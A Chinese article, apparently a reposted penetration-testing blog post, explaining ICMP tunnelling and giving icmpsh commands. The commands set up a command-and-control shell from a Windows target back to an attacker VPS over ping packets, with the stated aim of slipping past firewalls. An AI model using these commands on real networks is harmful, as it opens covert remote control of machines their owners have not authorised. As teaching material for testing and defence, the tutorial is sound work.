打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)
使用ICMP进行命令控制(Icmpsh)
目录

ICMP隧道

使用ICMP进行命令控制(Icmpsh)

ICMP隧道

ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。

在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙一般不会屏蔽ping的数据包),实现不受限制的访问访问。

使用ICMP进行命令控制(Icmpsh)

适用场景:目标机器是Windows服务器的情况

git clone https://github.com/inquisb/icmpsh.git #先下载icmpsh工具

VPS的操作

sysctl -w net.ipv4.icmp_echo_ignore_all=1       #关闭icmp回复,如果要开启icmp回复,该值设置为0python2 icmpsh_m.py 172.31.226.161 x.x.x.x      #运行,第一个IP是VPS的eth0网卡IP,第二个IP是目标机器出口的公网IP

目标机器的操作:

icmpsh.exe -t x.x.x.x -d 500 -b 30 -s 128

抓包,可以看到两者之间通信都是icmp的数据包

责编:vivian

来源:谢公子博客

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
ICMP隧道通信原理与通信特征
巧妙使用ping命令检查网络故障所在
windows网络命令:ping、ipconfig、tracert、netstat、arp
在ping命令里边重要里边TTL是什么意思?Request timed out提示
Ping使用方法大全
PING命令入门详解 - 〖软件下载交流〗 - MACD股市技术分析俱乐部 - bbs.m...
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服